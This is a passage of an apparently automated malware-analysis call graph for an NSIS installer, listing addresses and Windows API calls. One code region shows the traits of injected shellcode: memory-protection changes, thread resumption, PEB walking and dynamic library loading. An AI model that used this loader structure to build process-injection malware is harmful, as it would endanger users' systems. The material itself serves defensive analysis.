9436->9323 9437->9334 9439 405b53 CloseHandle 9438->9439 9440 405b5f 9438->9440 9439->9440 9440->9334 9442 403b2a 9441->9442 9443 403b1c CloseHandle 9441->9443 9479 403b57 9442->9479 9443->9442 9446 405c49 67 API calls 9447 403a5e OleUninitialize 9446->9447 9447->9290 9447->9291 9448->9351 9449->9353 9450->9357 9452 403022 9451->9452 9453 40303a 9451->9453 9454 403032 9452->9454 9455 40302b DestroyWindow 9452->9455 9456 403042 9453->9456 9457 40304a GetTickCount 9453->9457 9454->9360 9455->9454 9464 406946 9456->9464 9459 403058 CreateDialogParamW ShowWindow 9457->9459 9460 40307b 9457->9460 9459->9460 9460->9360 9462->9366 9463->9368 9465 406963 PeekMessageW 9464->9465 9466 403048 9465->9466 9467 406959 DispatchMessageW 9465->9467 9466->9360 9467->9465 9469 403ed6 9468->9469 9478 406484 wsprintfW 9469->9478 9471 403f47 9472 403f7b 18 API calls 9471->9472 9474 403f4c 9472->9474 9473 403c77 9473->9390 9474->9473 9475 40657a 17 API calls 9474->9475 9475->9474 9476->9387 9477->9392 9478->9471 9480 403b65 9479->9480 9481 403b2f 9480->9481 9482 403b6a FreeLibrary GlobalFree 9480->9482 9481->9446 9482->9481 9482->9482 10228 2a47dcb 10229 2a47e01 10228->10229 10230 2a47f57 10229->10230 10232 2a59d00 10229->10232 10234 2a55744 10229->10234 10231 2a591d8 NtResumeThread 10230->10231 10233 2a48009 10231->10233 10236 2a591d8 NtResumeThread 10233->10236 10235 2a5590a LoadLibraryA 10234->10235 10238 2a56045 2 API calls 10234->10238 10239 2a4dd8e 10234->10239 10237 2a5591b 10235->10237 10240 2a480aa 10236->10240 10241 2a558f2 10238->10241 10242 2a591d8 NtResumeThread 10240->10242 10241->10235 10243 2a48193 10242->10243 10244 2a591d8 NtResumeThread 10243->10244 10245 2a481ac 10244->10245 9798 401a30 9799 402da6 17 API calls 9798->9799 9800 401a39 ExpandEnvironmentStringsW 9799->9800 9801 401a4d 9800->9801 9803 401a60 9800->9803 9802 401a52 lstrcmpW 9801->9802 9801->9803 9802->9803 9524 2a58ad4 9525 2a58b57 NtProtectVirtualMemory 9524->9525 9542 402434 9543 402467 9542->9543 9544 40243c 9542->9544 9545 402da6 17 API calls 9543->9545 9546 402de6 17 API calls 9544->9546 9548 40246e 9545->9548 9547 402443 9546->9547 9549 40244d 9547->9549 9552 40247b 9547->9552 9554 402e64 9548->9554 9551 402da6 17 API calls 9549->9551 9553 402454 RegDeleteValueW RegCloseKey 9551->9553 9553->9552 9555 402e71 9554->9555 9556 402e78 9554->9556 9555->9552 9556->9555 9558 402ea9 9556->9558 9559 4063aa RegOpenKeyExW 9558->9559 9560 402ed7 9559->9560 9561 402ee7 RegEnumValueW 9560->9561 9562 402f0a 9560->9562 9569 402f81 9560->9569 9561->9562 9564 402f71 RegCloseKey 9561->9564 9563 402f46 RegEnumKeyW 9562->9563 9562->9564 9565 402f4f RegCloseKey 9562->9565 9567 402ea9 6 API calls 9562->9567 9563->9562 9563->9565 9564->9569 9566 40690a 5 API calls 9565->9566 9568 402f5f 9566->9568 9567->9562 9568->9569 9570 402f63 RegDeleteKeyW 9568->9570 9569->9555 9570->9569 10264 401735 10265 402da6 17 API calls 10264->10265 10266 40173c SearchPathW 10265->10266 10267 401757 10266->10267 10268 401d38 10269 402d84 17 API calls 10268->10269 10270 401d3f 10269->10270 10271 402d84 17 API calls 10270->10271 10272 401d4b GetDlgItem 10271->10272 10273 402638 10272->10273 9578 2a591d8 9580 2a591dd 9578->9580 9581 2a5922b 9580->9581 9582 2a59546 NtResumeThread 9581->9582 9583 2a59562 9582->9583 9804 40263e 9805 402652 9804->9805 9806 40266d 9804->9806 9809 402d84 17 API calls 9805->9809 9807 402672 9806->9807 9808 40269d 9806->9808 9810 402da6 17 API calls 9807->9810 9811 402da6 17 API calls 9808->9811 9819 402659 9809->9819 9812 402679 9810->9812 9813 4026a4 lstrlenW 9811->9813 9821 40655f WideCharToMultiByte 9812->9821 9813->9819 9815 40268d lstrlenA 9815->9819 9816 4026d1 9817 4026e7 9816->9817 9818 4060df WriteFile 9816->9818 9818->9817 9819->9816 9819->9817 9820 40610e 5 API calls 9819->9820 9820->9816 9821->9815 8574 4015c1 8575 402da6 17 API calls 8574->8575 8576 4015c8 8575->8576 8577 405eb7 4 API calls 8576->8577 8589 4015d1 8577->8589 8578 401631 8580 401663 8578->8580 8581 401636 8578->8581 8579 405e39 CharNextW 8579->8589 8584 401423 24 API calls 8580->8584 8601 401423 8581->8601 8591 40165b 8584->8591 8588 40164a SetCurrentDirectoryW 8588->8591 8589->8578 8589->8579 8590 401617 GetFileAttributesW 8589->8590 8593 405b08 8589->8593 8596 405a6e CreateDirectoryW 8589->8596 8605 405aeb CreateDirectoryW 8589->8605 8590->8589 8608 40690a GetModuleHandleA 8593->8608 8597 405abf GetLastError 8596->8597 8598 405abb 8596->8598 8597->8598 8599 405ace SetFileSecurityW 8597->8599 8598->8589 8599->8598 8600 405ae4 GetLastError 8599->8600 8600->8598 8602 40559f 24 API calls 8601->8602 8603 401431 8602->8603 8604 40653d lstrcpynW 8603->8604 8604->8588 8606 405afb 8605->8606 8607 405aff GetLastError 8605->8607 8606->8589 8607->8606 8609 406930 GetProcAddress 8608->8609 8610 406926 8608->8610 8612 405b0f 8609->8612 8614 40689a GetSystemDirectoryW 8610->8614 8612->8589 8613 40692c 8613->8609 8613->8612 8616 4068bc wsprintfW LoadLibraryExW 8614->8616 8616->8613 9822 4028c4 9823 4028ca 9822->9823 9824 4028d2 FindClose 9823->9824 9825 402c2a 9823->9825 9824->9825 10274 2a4492d 10275 2a4491d 10274->10275 10276 2a44936 10275->10276 10277 2a591d8 NtResumeThread 10275->10277 10278 2a44927 10277->10278 8686 4014cb 8687 40559f 24 API calls 8686->8687 8688 4014d2 8687->8688 9826 4016cc 9827 402da6 17 API calls 9826->9827 9828 4016d2 GetFullPathNameW 9827->9828 9831 4016ec 9828->9831 9835 40170e 9828->9835 9829 401723 GetShortPathNameW 9830 402c2a 9829->9830 9832 406873 2 API calls 9831->9832 9831->9835 9833 4016fe 9832->9833 9833->9835 9836 40653d lstrcpynW 9833->9836 9835->9829 9835->9830 9836->9835 10279 4045cf lstrcpynW lstrlenW 9837 6fe01774 9838 6fe017a3 9837->9838 9839 6fe01bff 22 API calls 9838->9839 9840 6fe017aa 9839->9840 9841 6fe017b1 9840->9841 9842 6fe017bd 9840->9842 9843 6fe01312 2 API calls 9841->9843 9844 6fe017e4 9842->9844 9845 6fe017c7 9842->9845 9849 6fe017bb 9843->9849 9847 6fe017ea 9844->9847 9848 6fe0180e 9844->9848 9846 6fe015dd 3 API calls 9845->9846 9850 6fe017cc 9846->9850 9851 6fe01654 3 API calls 9847->9851 9852 6fe015dd 3 API calls 9848->9852 9853 6fe01654 3 API calls 9850->9853 9854 6fe017ef 9851->9854 9852->9849 9855 6fe017d2 9853->9855 9856 6fe01312 2 API calls 9854->9856 9857 6fe01312 2 API calls 9855->9857 9858 6fe017f5 GlobalFree 9856->9858 9859 6fe017d8 GlobalFree 9857->9859 9858->9849 9860 6fe01809 GlobalFree 9858->9860 9859->9849 9860->9849 9861 4014d7 9862 402d84 17 API calls 9861->9862 9863 4014dd Sleep 9862->9863 9865 402c2a 9863->9865 8698 4020d8 8699 4020ea 8698->8699 8709 40219c 8698->8709 8700 402da6 17 API calls 8699->8700 8702 4020f1 8700->8702 8701 401423 24 API calls 8707 4022f6 8701->8707 8703 402da6 17 API calls 8702->8703 8704 4020fa 8703->8704 8705 402110 LoadLibraryExW 8704->8705 8706 402102 GetModuleHandleW 8704->8706 8708 402121 8705->8708 8705->8709 8706->8705 8706->8708 8721 406979 8708->8721 8709->8701 8712 402132 8714 402151 8712->8714 8715 40213a 8712->8715 8713 40216b 8716 40559f 24 API calls 8713->8716 8726 6fe01817 8714->8726 8717 401423 24 API calls 8715->8717 8718 402142 8716->8718 8717->8718 8718->8707 8719 40218e FreeLibrary 8718->8719 8719->8707 8768 40655f WideCharToMultiByte 8721->8768 8723 406996 8724 40699d GetProcAddress 8723->8724 8725 40212c 8723->8725 8724->8725 8725->8712 8725->8713 8727 6fe0184a 8726->8727 8769 6fe01bff 8727->8769 8729 6fe01976 8729->8718 8730 6fe01851 8730->8729 8731 6fe01862 8730->8731 8732 6fe01869 8730->8732 8819 6fe0243e 8731->8819 8803 6fe02480 8732->8803 8737 6fe018cd 8743 6fe018d3 8737->8743 8744 6fe0191e 8737->8744 8738 6fe018af 8832 6fe02655 8738->8832 8739 6fe01898 8753 6fe0188e 8739->8753 8829 6fe02e23 8739->8829 8740 6fe0187f 8742 6fe01885 8740->8742 8746 6fe01890 8740->8746 8742->8753 8813 6fe02b98 8742->8813 8851 6fe01666 8743->8851 8750 6fe02655 10 API calls 8744->8750 8745 6fe018b5 8843 6fe01654 8745->8843 8823 6fe02810 8746->8823 8751 6fe0190f 8750->8751 8759 6fe01965 8751->8759 8857 6fe02618 8751->8857 8753->8737 8753->8738 8757 6fe01896 8757->8753 8758 6fe02655 10 API calls 8758->8751 8759->8729 8763 6fe0196f GlobalFree 8759->8763 8763->8729 8765 6fe01951 8765->8759 8861 6fe015dd wsprintfW 8765->8861 8766 6fe0194a FreeLibrary 8766->8765 8768->8723 8864 6fe012bb GlobalAlloc 8769->8864 8771 6fe01c26 8865 6fe012bb GlobalAlloc 8771->8865 8773 6fe01e6b GlobalFree GlobalFree GlobalFree 8774 6fe01e88 8773->8774 8787 6fe01ed2 8773->8787 8775 6fe0227e 8774->8775 8783 6fe01e9d 8774->8783 8774->8787 8777 6fe022a0 GetModuleHandleW 8775->8777 8775->8787 8776 6fe01d26 GlobalAlloc 8790 6fe01c31 8776->8790 8780 6fe022b1 LoadLibraryW 8777->8780 8781 6fe022c6 8777->8781 8778 6fe01d71 lstrcpyW 8782 6fe01d7b lstrcpyW 8778->8782 8779 6fe01d8f GlobalFree 8779->8790 8780->8781 8780->8787 8872 6fe016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8781->8872 8782->8790 8783->8787 8868 6fe012cc 8783->8868 8785 6fe02318 8785->8787 8789 6fe02325 lstrlenW 8785->8789 8786 6fe02126 8871 6fe012bb GlobalAlloc 8786->8871 8787->8730 8873 6fe016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8789->8873 8790->8773 8790->8776 8790->8778 8790->8779 8790->8782 8790->8786 8790->8787 8794 6fe02067 GlobalFree 8790->8794 8795 6fe021ae 8790->8795 8797 6fe012cc 2 API calls 8790->8797 8798 6fe01dcd 8790->8798 8792 6fe022d8 8792->8785 8801 6fe02302 GetProcAddress 8792->8801 8794->8790 8795->8787 8800 6fe02216 lstrcpyW 8795->8800 8796 6fe0233f 8796->8787 8797->8790 8798->8790 8866 6fe0162f GlobalSize GlobalAlloc 8798->8866 8800->8787 8801->8785 8802 6fe0212f 8802->8730 8810 6fe02498 8803->8810 8805 6fe025c1 GlobalFree 8806 6fe0186f 8805->8806 8805->8810 8806->8739 8806->8740 8806->8753 8807 6fe02540 GlobalAlloc WideCharToMultiByte 8807->8805 8808 6fe0256b GlobalAlloc CLSIDFromString 8808->8805 8809 6fe012cc GlobalAlloc lstrcpynW 8809->8810 8810->8805 8810->8807 8810->8808 8810->8809 8811 6fe0258a 8810->8811 8875 6fe0135a 8810->8875 8811->8805 8879 6fe027a4 8811->8879 8815 6fe02baa 8813->8815 8814 6fe02c4f ReadFile 8818 6fe02c6d 8814->8818 8815->8814 8817 6fe02d39 8817->8753 8882 6fe02b42 8818->8882 8820 6fe02453 8819->8820 8821 6fe0245e GlobalAlloc 8820->8821 8822 6fe01868 8820->8822 8821->8820 8822->8732 8827 6fe02840 8823->8827 8824 6fe028db GlobalAlloc 8828 6fe028fe 8824->8828 8825 6fe028ee 8826 6fe028f4 GlobalSize 8825->8826 8825->8828 8826->8828 8827->8824 8827->8825 8828->8757 8830 6fe02e2e 8829->8830 8831 6fe02e6e GlobalFree 8830->8831 8886 6fe012bb GlobalAlloc 8832->8886 8834 6fe026d8 MultiByteToWideChar 8842 6fe0265f 8834->8842 8835 6fe026fa StringFromGUID2 8835->8842 8836 6fe0270b lstrcpynW 8836->8842 8837 6fe0271e wsprintfW 8837->8842 8838 6fe02742 GlobalFree 8838->8842 8839 6fe02777 GlobalFree 8839->8745 8840 6fe01312 2 API calls 8840->8842 8842->8834 8842->8835 8842->8836 8842->8837 8842->8838 8842->8839 8842->8840 8887 6fe01381 8842->8887 8891 6fe012bb GlobalAlloc 8843->8891 8845 6fe01659 8846 6fe01666 2 API calls 8845->8846 8847 6fe01663 8846->8847 8848 6fe01312 8847->8848 8849 6fe01355 GlobalFree 8848->8849 8850 6fe0131b GlobalAlloc lstrcpynW 8848->8850 8849->8751 8850->8849 8852 6fe01672 wsprintfW 8851->8852 8853 6fe0169f lstrcpyW 8851->8853 8856 6fe016b8 8852->8856 8853->8856 8856->8758 8858 6fe02626 8857->8858 8860 6fe01931 8857->8860 8859 6fe02642 GlobalFree 8858->8859 8858->8860 8859->8858 8860->8765 8860->8766 8862 6fe01312 2 API calls 8861->8862 8863 6fe015fe 8862->8863 8863->8759 8864->8771 8865->8790 8867 6fe0164d 8866->8867 8867->8798 8874 6fe012bb GlobalAlloc 8868->8874 8870 6fe012db lstrcpynW 8870->8787 8871->8802 8872->8792 8873->8796 8874->8870 8876 6fe01361 8875->8876 8877 6fe012cc 2 API calls 8876->8877 8878 6fe0137f 8877->8878 8878->8810 8880 6fe027b2 VirtualAlloc 8879->8880 8881 6fe02808 8879->8881 8880->8881 8881->8811 8883 6fe02b4d 8882->8883 8884 6fe02b52 GetLastError 8883->8884 8885 6fe02b5d 8883->8885 8884->8885 8885->8817 8886->8842 8888 6fe0138a 8887->8888 8889 6fe013ac 8887->8889 8888->8889 8890 6fe01390 lstrcpyW 8888->8890 8889->8842 8890->8889 8891->8845 9866 6fe01979 9867 6fe0199c 9866->9867 9868 6fe019d1 GlobalFree 9867->9868 9869 6fe019e3 9867->9869 9868->9869 9870 6fe01312 2 API calls 9869->9870 9871 6fe01b6e GlobalFree GlobalFree 9870->9871 9038 401ede 9039 402d84 17 API calls 9038->9039 9040 401ee4 9039->9040 9041 402d84 17 API calls 9040->9041 9042 401ef0 9041->9042 9043 401f07 EnableWindow 9042->9043 9044 401efc ShowWindow 9042->9044 9045 402c2a 9043->9045 9044->9045 9046 4056de 9047 405888 9046->9047 9048 4056ff GetDlgItem GetDlgItem GetDlgItem 9046->9048 9050 405891 GetDlgItem CreateThread CloseHandle 9047->9050 9051 4058b9 9047->9051 9092 4044ce SendMessageW 9048->9092 9050->9051 9095 405672 OleInitialize 9050->9095 9052 4058e4 9051->9052 9053 4058d0 ShowWindow ShowWindow 9051->9053 9054 405909 9051->9054 9055 4058f0 9052->9055 9056 405944 9052->9056 9094 4044ce SendMessageW 9053->9094 9062 404500 8 API calls 9054->9062 9060 4058f8 9055->9060 9061 40591e ShowWindow 9055->9061 9056->9054 9065 405952 SendMessageW 9056->9065 9057 40576f 9058 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 9057->9058 9063 4057e4 9058->9063 9064 4057c8 SendMessageW SendMessageW 9058->9064 9066 404472 SendMessageW 9060->9066 9068 405930 9061->9068 9069 40593e 9061->9069 9067 405917 9062->9067 9070 4057f7 9063->9070 9071 4057e9 SendMessageW 9063->9071 9064->9063 9065->9067 9072 40596b CreatePopupMenu 9065->9072 9066->9054 9073 40559f 24 API calls 9068->9073 9074 404472 SendMessageW 9069->9074 9076 404499 18 API calls 9070->9076 9071->9070 9075 40657a 17 API calls 9072->9075 9073->9069 9074->9056 9077 40597b AppendMenuW 9075->9077 9078 405807 9076->9078 9079 405998 GetWindowRect 9077->9079 9080 4059ab TrackPopupMenu 9077->9080 9081 405810 ShowWindow 9078->9081 9082 405844 GetDlgItem SendMessageW 9078->9082 9079->9080 9080->9067 9083 4059c6 9080->9083 9084 405826 ShowWindow 9081->9084 9087 405833 9081->9087 9082->9067 9085 40586b SendMessageW SendMessageW 9082->9085 9086 4059e2 SendMessageW 9083->9086 9084->9087 9085->9067 9086->9086 9088 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 9086->9088 9093 4044ce SendMessageW 9087->9093 9090 405a24 SendMessageW 9088->9090 9090->9090 9091 405a4d GlobalUnlock SetClipboardData CloseClipboard 9090->9091 9091->9067 9092->9057 9093->9082 9094->9052 9096 4044e5 SendMessageW 9095->9096 9097 405695 9096->9097 9100 401389 2 API calls 9097->9100 9101 4056bc 9097->9101 9098 4044e5 SendMessageW 9099 4056ce OleUninitialize 9098->9099 9100->9097 9101->9098 9872 4028de 9873 4028e6 9872->9873 9874 4028ea FindNextFileW 9873->9874 9875 4028fc 9873->9875 9874->9875 9876 402943 9874->9876 9878 40653d lstrcpynW 9876->9878 9878->9875 9117 6fe02a7f 9118 6fe02acf 9117->9118 9119 6fe02a8f VirtualProtect 9117->9119 9119->9118 9879 404ce0 9880 404cf0 9879->9880 9881 404d0c 9879->9881 9890 405b81 GetDlgItemTextW 9880->9890 9883 404d12 SHGetPathFromIDListW 9881->9883 9884 404d3f 9881->9884 9886 404d29 SendMessageW 9883->9886 9887 404d22 9883->9887 9885 404cfd SendMessageW 9885->9881 9886->9884 9889 40140b 2 API calls 9887->9889 9889->9886 9890->9885 9891 6fe02d43 9892 6fe02d5b 9891->9892 9893 6fe0162f 2 API calls 9892->9893 9894 6fe02d76 9893->9894 9895 402aeb 9896 402d84 17 API calls 9895->9896 9897 402af1 9896->9897 9898 40657a 17 API calls 9897->9898 9899 40292e 9897->9899 9898->9899 10280 2a5570e GetPEB 9153 4026ec 9154 402d84 17 API calls 9153->9154 9163 4026fb 9154->9163 9155 402838 9156 402745 ReadFile 9156->9155 9156->9163 9157 4027de 9157->9155 9157->9163 9167 40610e SetFilePointer 9157->9167 9158 4060b0 ReadFile 9158->9163 9159 402785 MultiByteToWideChar 9159->9163 9160 40283a 9176 406484 wsprintfW 9160->9176 9163->9155 9163->9156 9163->9157 9163->9158 9163->9159 9163->9160 9164 4027ab SetFilePointer MultiByteToWideChar 9163->9164 9165 40284b 9163->9165 9164->9163 9165->9155 9166 40286c SetFilePointer 9165->9166 9166->9155 9168 40612a 9167->9168 9175 406142 9167->9175 9169 4060b0 ReadFile 9168->9169 9170 406136 9169->9170 9171 406173 SetFilePointer 9170->9171 9172 40614b SetFilePointer 9170->9172 9170->9175 9171->9175 9172->9171 9173 406156 9172->9173 9174 4060df WriteFile 9173->9174 9174->9175 9175->9157 9176->9155 10281 2a44b14 10283 2a44acf 10281->10283 10282 2a44bbf 10283->10282 10284 2a55b01 3 API calls 10283->10284 10284->10283 9571 4023f4 9572 402da6 17 API calls 9571->9572 9573 402403 9572->9573 9574 402da6 17 API calls 9573->9574 9575 40240c 9574->9575 9576 402da6 17 API calls 9575->9576 9577 402416 GetPrivateProfileStringW 9576->9577 9900 4014f5 SetForegroundWindow 9901 402c2a 9900->9901 9902 2a43c12 9905 2a43bf7 9902->9905 9903 2a4cb44 GetPEB 9903->9905 9904 2a43e1b 9905->9902 9905->9903 9905->9904 9905->9905 9906 2a55744 9905->9906 9906->9904 9907 2a5590a LoadLibraryA 9906->9907 9909 2a56045 2 API calls 9906->9909 9908 2a5591b 9907->9908 9910 2a558f2 9909->9910 9910->9907 10285 401ff6 10286 402da6 17 API calls 10285->10286 10287 401ffd 10286->10287 10288 406873 2 API calls 10287->10288 10289 402003 10288->10289 10291 402014 10289->10291 10292 406484 wsprintfW 10289->10292 10292->10291 10293 6fe01058 10295 6fe01074 10293->10295 10294 6fe010dd 10295->10294 10296 6fe015b6 GlobalFree 10295->10296 10297 6fe01092 10295->10297 10296->10297 10298 6fe015b6 GlobalFree 10297->10298 10299 6fe010a2 10298->10299 10300 6fe010b2 10299->10300 10301 6fe010a9 GlobalSize 10299->10301 10302 6fe010b6 GlobalAlloc 10300->10302 10303 6fe010c7 10300->10303 10301->10300 10304 6fe015dd 3 API calls 10302->10304 10305 6fe010d2 GlobalFree 10303->10305 10304->10303 10305->10294 9584 4022ff 9585 402da6 17 API calls 9584->9585 9586 402305 9585->9586 9587 402da6 17 API calls 9586->9587 9588 40230e 9587->9588 9589 402da6 17 API calls 9588->9589 9590 402317 9589->9590 9591 406873 2 API calls 9590->9591 9592 402320 9591->9592 9593 402331 lstrlenW lstrlenW 9592->9593 9597 402324 9592->9597 9595 40559f 24 API calls 9593->9595 9594 40559f 24 API calls 9598 40232c 9594->9598 9596 40236f SHFileOperationW 9595->9596 9596->9597 9596->9598 9597->9594 9597->9598 10306 4019ff 10307 402da6 17 API calls 10306->10307 10308 401a06 10307->10308 10309 402da6 17 API calls 10308->10309 10310 401a0f 10309->10310 10311 401a16 lstrcmpiW 10310->10311 10312 401a28 lstrcmpW 10310->10312 10313 401a1c 10311->10313 10312->10313 10314 401d81 10315 401d94 GetDlgItem 10314->10315 10316 401d87 10314->10316 10317 401d8e 10315->10317 10318 402d84 17 API calls 10316->10318 10319 402da6 17 API calls 10317->10319 10321 401dd5 GetClientRect LoadImageW SendMessageW 10317->10321 10318->10317 10319->10321 10322 401e33 10321->10322 10324 401e3f 10321->10324 10323 401e38 DeleteObject 10322->10323 10322->10324 10323->10324 10325 402383 10326 40238a 10325->10326 10329 40239d 10325->10329 10327 40657a 17 API calls 10326->10327 10328 402397 10327->10328 10328->10329 10330 405b9d MessageBoxIndirectW 10328->10330 10330->10329 8617 2a4386c 8621 2a58bd6 8617->8621 8619 2a43833 8619->8617 8620 2a438d6 8619->8620 8622 2a55744 8621->8622 8623 2a55874 8622->8623 8624 2a5590a LoadLibraryA 8622->8624 8627 2a4dd8e 8622->8627 8629 2a56045 GetPEB 8623->8629 8625 2a5591b 8624->8625 8625->8619 8627->8619 8628 2a558f2 8628->8624 8632 2a55744 8629->8632 8633 2a4dd8e 8629->8633 8630 2a5590a LoadLibraryA 8631 2a5591b 8630->8631 8631->8628 8632->8630 8632->8633 8633->8628 8634 40248a 8635 402da6 17 API calls 8634->8635 8636 40249c 8635->8636 8637 402da6 17 API calls 8636->8637 8638 4024a6 8637->8638 8651 402e36 8638->8651 8641 402c2a 8642 4024de 8644 4024ea 8642->8644 8655 402d84 8642->8655 8643 402da6 17 API calls 8645 4024d4 lstrlenW 8643->8645 8647 402509 RegSetValueExW 8644->8647 8658 4032b4 8644->8658 8645->8642 8649 40251f RegCloseKey 8647->8649 8649->8641 8652 402e51 8651->8652 8678 4063d8 8652->8678 8656 40657a 17 API calls 8655->8656 8657 402d99 8656->8657 8657->8644 8659 4032cd 8658->8659 8660 4032fb 8659->8660 8685 4034e5 SetFilePointer 8659->8685 8682 4034cf 8660->8682 8664 403468 8666 4034aa 8664->8666 8671 40346c 8664->8671 8665 403318 GetTickCount 8667 403452 8665->8667 8674 403367 8665->8674 8668 4034cf ReadFile 8666->8668 8667->8647 8668->8667 8669 4034cf ReadFile 8669->8674 8670 4034cf ReadFile 8670->8671 8671->8667 8671->8670 8672 4060df WriteFile 8671->8672 8672->8671 8673 4033bd GetTickCount 8673->8674 8674->8667 8674->8669 8674->8673 8675 4033e2 MulDiv wsprintfW 8674->8675 8677 4060df WriteFile 8674->8677 8676 40559f 24 API calls 8675->8676 8676->8674 8677->8674 8679 4063e7 8678->8679 8680 4063f2 RegCreateKeyExW 8679->8680 8681 4024b6 8679->8681 8680->8681 8681->8641 8681->8642 8681->8643 8683 4060b0 ReadFile 8682->8683 8684 403306 8683->8684 8684->8664 8684->8665 8684->8667 8685->8660 10331 40498a 10332 4049b6 10331->10332 10333 4049c7 10331->10333 10392 405b81 GetDlgItemTextW 10332->10392 10335 4049d3 GetDlgItem 10333->10335 10340 404a32 10333->10340 10337 4049e7 10335->10337 10336 4049c1 10339 4067c4 5 API calls 10336->10339 10343 4049fb SetWindowTextW 10337->10343 10348 405eb7 4 API calls 10337->10348 10338 404b16 10341 404cc5 10338->10341 10394 405b81 GetDlgItemTextW 10338->10394 10339->10333 10340->10338 10340->10341 10345 40657a 17 API calls 10340->10345 10347 404500 8 API calls 10341->10347 10346 404499 18 API calls 10343->10346 10344 404b46 10349 405f14 18 API calls 10344->10349 10350 404aa6 SHBrowseForFolderW 10345->10350 10351 404a17 10346->10351 10352 404cd9 10347->10352 10353 4049f1 10348->10353 10354 404b4c 10349->10354 10350->10338 10355 404abe CoTaskMemFree 10350->10355 10356 404499 18 API calls 10351->10356 10353->10343 10357 405e0c 3 API calls 10353->10357 10395 40653d lstrcpynW 10354->10395 10358 405e0c 3 API calls 10355->10358 10359 404a25 10356->10359 10357->10343 10360 404acb 10358->10360 10393 4044ce SendMessageW 10359->10393 10363 404b02 SetDlgItemTextW 10360->10363 10368 40657a 17 API calls 10360->10368 10363->10338 10364 404a2b 10366 40690a 5 API calls 10364->10366 10365 404b63 10367 40690a 5 API calls 10365->10367 10366->10340 10375 404b6a 10367->10375 10369 404aea lstrcmpiW 10368->10369 10369->10363 10372 404afb lstrcatW 10369->10372 10370 404bab 10396 40653d lstrcpynW 10370->10396 10372->10363 10373 404bb2 10374 405eb7 4 API calls 10373->10374 10376 404bb8 GetDiskFreeSpaceW 10374->10376 10375->10370 10378 405e58 2 API calls 10375->10378 10380 404c03 10375->10380 10379 404bdc MulDiv 10376->10379 10376->10380 10378->10375 10379->10380 10381 404c74 10380->10381 10382 404e0f 20 API calls 10380->10382 10383 404c97 10381->10383 10384 40140b 2 API calls 10381->10384 10385 404c61 10382->10385 10397 4044bb KiUserCallbackDispatcher 10383->10397 10384->10383 10387 404c76 SetDlgItemTextW 10385->10387 10388 404c66 10385->10388 10387->10381 10390 404d46 20 API calls 10388->10390 10389 404cb3 10389->10341 10391 4048e3 SendMessageW 10389->10391 10390->10381 10391->10341 10392->10336 10393->10364 10394->10344 10395->10365 10396->10373 10397->10389 10398 2a4636f 10401 2a487b5 10398->10401 10400 2a46374 10404 2a54525 10401->10404 10403 2a545cf 10404->10403 10411 2a545e7 10404->10411 10431 2a487ba 10404->10431 10461 2a48808 10404->10461 10406 2a54ad7 10408 2a54c6c CreateFileA 10406->10408 10407 2a549a6 10407->10406 10410 2a54875 10407->10410 10413 2a54af7 10408->10413 10409 2a54ac6 10409->10410 10423 2a54b22 10409->10423 10410->10400 10412 2a54c6c CreateFileA 10410->10412 10411->10403 10411->10406 10411->10407 10411->10409 10411->10410 10411->10413 10422 2a5478d 10411->10422 10412->10413 10414 2a54bdd 10413->10414 10417 2a54b96 7 API calls 10413->10417 10414->10400 10415 2a57403 6 API calls 10414->10415 10426 2a54ff7 10414->10426 10416 2a573fd 10415->10416 10418 2a54e18 10417->10418 10419 2a54db4 CreateFileA 10418->10419 10418->10422 10419->10400 10420 2a54b93 10421 2a54c6c CreateFileA 10420->10421 10421->10414 10422->10414 10422->10426 10427 2a54f75 10422->10427 10423->10413 10423->10420 10424 2a5590a LoadLibraryA 10425 2a5591b 10424->10425 10425->10400 10426->10400 10427->10424 10428 2a56045 2 API calls 10427->10428 10429 2a4dd8e 10427->10429 10430 2a558f2 10428->10430 10429->10400 10430->10424 10440 2a487e5 10431->10440 10432 2a48808 3 API calls 10432->10440 10433 2a54f75 10434 2a5590a LoadLibraryA 10433->10434 10437 2a56045 2 API calls 10433->10437 10438 2a4dd8e 10433->10438 10436 2a5591b 10434->10436 10435 2a545cf 10436->10404 10439 2a558f2 10437->10439 10438->10404 10439->10434 10440->10432 10440->10433 10440->10435 10441 2a487ba 8 API calls 10440->10441 10445 2a545e7 10440->10445 10441->10440 10442 2a54c6c CreateFileA 10447 2a54af7 10442->10447 10443 2a549a6 10444 2a54875 10443->10444 10449 2a54ad7 10443->10449 10444->10404 10450 2a54c6c CreateFileA 10444->10450 10445->10435 10445->10443 10445->10444 10446 2a54ac6 10445->10446 10445->10447 10445->10449 10456 2a5478d 10445->10456 10446->10444 10460 2a54b22 10446->10460 10448 2a54bdd 10447->10448 10453 2a54b96 7 API calls 10447->10453 10448->10404 10451 2a57403 6 API calls 10448->10451 10458 2a54ff7 10448->10458 10449->10442 10450->10447 10452 2a573fd 10451->10452 10454 2a54e18 10453->10454 10455 2a54db4 CreateFileA 10454->10455 10454->10456 10455->10404 10456->10433 10456->10448 10456->10458 10457 2a54b93 10459 2a54c6c CreateFileA 10457->10459 10458->10404 10459->10448 10460->10447 10460->10457 10466 2a48867 10461->10466 10462 2a5590a LoadLibraryA 10463 2a5591b 10462->10463 10463->10404 10464 2a56045 2 API calls 10465 2a558f2 10464->10465 10465->10462 10466->10404 10466->10462 10466->10464 10467 2a48b6a 10466->10467 10467->10404 10468 2a47f6f 10469 2a47f17 10468->10469 10470 2a47f72 10468->10470 10471 2a591d8 NtResumeThread 10470->10471 10472 2a48009 10471->10472 10473 2a591d8 NtResumeThread 10472->10473 10474 2a480aa 10473->10474 10475 2a591d8 NtResumeThread 10474->10475 10476 2a48193 10475->10476 10477 2a591d8 NtResumeThread 10476->10477 10478 2a481ac 10477->10478 10479 2a4476a 10481 2a44771 10479->10481 10480 2a591d8 NtResumeThread 10482 2a44927 10480->10482 10481->10480 10481->10482 8689 402891 8690 402898 8689->8690 8696 402ba9 8689->8696 8691 402d84 17 API calls 8690->8691 8692 40289f 8691->8692 8693 4028ae SetFilePointer 8692->8693 8694 4028be 8693->8694 8693->8696 8697 406484 wsprintfW 8694->8697 8697->8696 9911 401491 9912 40559f 24 API calls 9911->9912 9913 401498 9912->9913 10483 402f93 10484 402fa5 SetTimer 10483->10484 10485 402fbe 10483->10485 10484->10485 10486 403013 10485->10486 10487 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 10485->10487 10487->10486 8892 403f9a 8893 403fb2 8892->8893 